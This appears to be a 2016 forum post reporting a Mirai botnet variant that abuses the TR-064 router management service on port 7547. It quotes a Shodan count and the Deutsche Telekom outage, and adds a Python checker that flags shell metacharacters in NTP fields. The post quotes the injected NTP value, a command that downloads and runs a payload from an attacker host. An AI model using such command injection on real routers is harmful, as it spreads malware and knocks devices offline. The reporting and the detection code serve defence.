New Mirai attack vector – bot exploits a recently discovered router vulnerability

 ( toMpEr | Tuesday, November 29, 2016 - 2:16 )

The router rebooted every 15 to 20 minutes. The reader looked at the config and realized that his router got a new, suspicious entry in the NTP server name field, namely:
cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2
[...]
The ISPs of the entire world have the need to manage their infrastructure – in particular your modems or routers.
One of those protocols is called TR-064, also known as LAN-Side DSL CPE Configuration.
On some modems and routers TR-064 is publicly available to the outside world. It means that any internet user can command those devices to for example change DNS or NTP settings.
https://badcyber.com/new-mirai-attack-vector-bot-exploits-a-recently-discovered-router-vulnerability/

In Hungary, the affected port 7547 is reachable from the Internet on 176157 IPs.

via https://www.shodan.io/search?query=port%3A7547+country%3Ahu
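
A defensive check for the symptom described in the quoted article, as an added example that is not part of the original post or the linked article: it accepts an NTP server name only if it is a plain hostname or IP address and flags shell metacharacters. The config field names and all sample values are constructed assumptions; the flagged value only mimics the shape of the entry quoted above.

```python
import ipaddress
import re

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*\.?")
# Characters a shell would interpret if the value ever reached a command line.
_SHELL_META = set(";|&`$()<>\\\"' \t\n")


def check_ntp_server(value):
    """Return (ok, reason) for a value found in an NTP server name field."""
    hits = sorted(c for c in set(value) if c in _SHELL_META)
    if hits:
        return False, "shell metacharacters: " + " ".join(repr(c) for c in hits)
    try:
        ipaddress.ip_address(value)
        return True, "ip address"
    except ValueError:
        pass
    if len(value) <= 253 and _HOSTNAME.fullmatch(value):
        return True, "hostname"
    return False, "not a hostname or IP address"


def audit_config(fields):
    """Return the names of NTP fields whose non-empty value fails validation."""
    return [name for name, value in fields.items()
            if name.lower().startswith("ntp") and value
            and not check_ntp_server(value)[0]]


# Constructed sample config export; field names are hypothetical.
SAMPLE = {
    "NTPServer1": "pool.ntp.org",
    "NTPServer2": "cd /tmp;echo constructed-sample",  # same shape as the quoted entry
    "NTPServer3": "192.0.2.10",
    "DNSServer1": "192.0.2.53",
}

if __name__ == "__main__":
    for name in audit_config(SAMPLE):
        print(name, "->", check_ntp_server(SAMPLE[name])[1])
```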

900,000 Routers Knocked Offline in Germany amid Rumors of Cyber-Attack

UPDATE 5: Malware experts at Kaspersky Lab have also confirmed a version of the Mirai IoT malware is behind the attacks on Deutsche Telekom routers.

http://www.bleepingcomputer.com/news/security/900-000-routers-knocked-offline-in-germany-amid-rumors-of-cyber-attack/